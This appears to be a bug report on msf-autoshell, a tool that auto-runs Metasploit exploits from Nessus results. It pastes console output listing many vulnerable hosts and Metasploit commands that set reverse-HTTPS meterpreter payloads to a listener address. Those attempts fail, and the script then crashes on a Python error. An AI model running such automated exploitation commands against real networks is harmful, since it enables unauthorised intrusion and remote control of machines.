Hi,
msf-autoshell looks very interesting. Thank you for that!
However, I'm running into some problems that seem related to a session validation issue. I don't know if I missed something, but here's the output of what I'm getting:
--
msf > python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[*] exec: python msf-autoshell.py -n /root/victim/nessus/victim_10_0_1_0.nessus
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - MS15-078 Microsoft Windows Font Driver Buffer Overflow
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - Windows ClientCopyImage Win32k Exploit
[+] Found vulnerable host! 10.0.2.146:445 - Windows TrackPopupMenu Win32k NULL Pointer Dereference
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.146:445 - Windows Net-NTLMv2 Reflection DCOM/RPC
[+] Found vulnerable host! 10.0.2.146:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.2.146:445 - MS14-064 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows Shell LNK Code Execution
[+] Found vulnerable host! 10.0.2.146:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS16-032 Secondary Logon Handle Privilege Escalation
[+] Found vulnerable host! 10.0.2.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.2.146:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.2.146:445 - MS14-060 Microsoft Windows OLE Package Manager Code Execution
[+] Found vulnerable host! 10.0.2.143:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.2.106:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.235:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.224:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.224:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java AtomicReferenceArray Type Violation Vulnerability
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player casi32 Integer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ShaderJob Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player ByteArray Use After Free
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player NetConnection Type Confusion
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player Drawing Fill Shader Memory Corruption
[+] Found vulnerable host! 10.0.1.224:445 - Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
[+] Found vulnerable host! 10.0.1.185:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.167:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:443 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.164:80 - PHP CGI Argument Injection
[+] Found vulnerable host! 10.0.1.157:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.157:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java Applet Field Bytecode Verifier Cache Remote Code Execution
[+] Found vulnerable host! 10.0.1.157:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.150:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.146:445 - Macrovision InstallShield Update Service ActiveX Unsafe Method
[+] Found vulnerable host! 10.0.1.126:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Reflection Type Confusion Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java storeImageArray() Invalid Array Indexing Vulnerability
[+] Found vulnerable host! 10.0.1.126:445 - Java CMM Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet Method Handle Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java Applet JMX Remote Code Execution
[+] Found vulnerable host! 10.0.1.126:445 - Java 7 Applet Remote Code Execution
[+] Found vulnerable host! 10.0.1.124:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.120:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.111:445 - Internet Explorer 11 VBScript Engine Memory Corruption
[+] Found vulnerable host! 10.0.1.111:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.105:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - LNK Code Execution Vulnerability
[+] Found vulnerable host! 10.0.1.92:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.92:445 - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office CVE-2017-11882
[+] Found vulnerable host! 10.0.1.90:445 - Office OLE Multiple DLL Side Loading Vulnerabilities
[+] Found vulnerable host! 10.0.1.90:445 - Microsoft Office Word Malicious Hta Execution
[+] Found vulnerable host! 10.0.1.86:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[+] Found vulnerable host! 10.0.1.79:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.72:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.71:2049 - NFS Mount Scanner
[+] Found vulnerable host! 10.0.1.58:445 - Microsoft Windows ALPC Task Scheduler Local Privilege Elevation
[*] Collecting list of all Metasploit modules...
[*] Running MSF command:
search exploit/
[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets
[*] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[*] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
[*] Running MSF command:
use exploit/windows/local/ms15_078_atmfd_bof
show targets
[*] Setting options on exploit/windows/local/ms15_078_atmfd_bof
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[*] exploit/windows/local/ms15_078_atmfd_bof output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
[*] Running MSF command:
use exploit/windows/local/mov_ss
show targets
[*] Setting options on exploit/windows/local/mov_ss
[*] Running MSF command:
set target 0
set RHOSTS 10.0.2.146
set RPORT 445
set LHOST 10.0.2.159
set SRVHOST 10.0.2.159
set payload windows/x64/meterpreter/reverse_https
set ExitOnSession True
[*] Running MSF command:
exploit -z
[*] exploit/windows/local/mov_ss output:
[-] Exploit failed: The following options failed to validate: SESSION.
[*] Running MSF command:
use exploit/windows/fileformat/office_ole_multiple_dll_hijack
show targets
Traceback (most recent call last):
  File "msf-autoshell.py", line 463, in <module>
    main()
  File "msf-autoshell.py", line 457, in main
    run_nessus_exploits(client, console_id, nes_exploits)
  File "msf-autoshell.py", line 162, in run_nessus_exploits
    module_output = run_msf_module(client, c_id, local_ip, ip, path, port, os_type)
  File "msf-autoshell.py", line 271, in run_msf_module
    cmd = create_msf_cmd(mod_path, rhost_var, ip, port, payload, target_num)
UnboundLocalError: local variable 'rhost_var' referenced before assignment
msf > sessions
Active sessions
No active sessions.
msf > jobs
Jobs
No active jobs.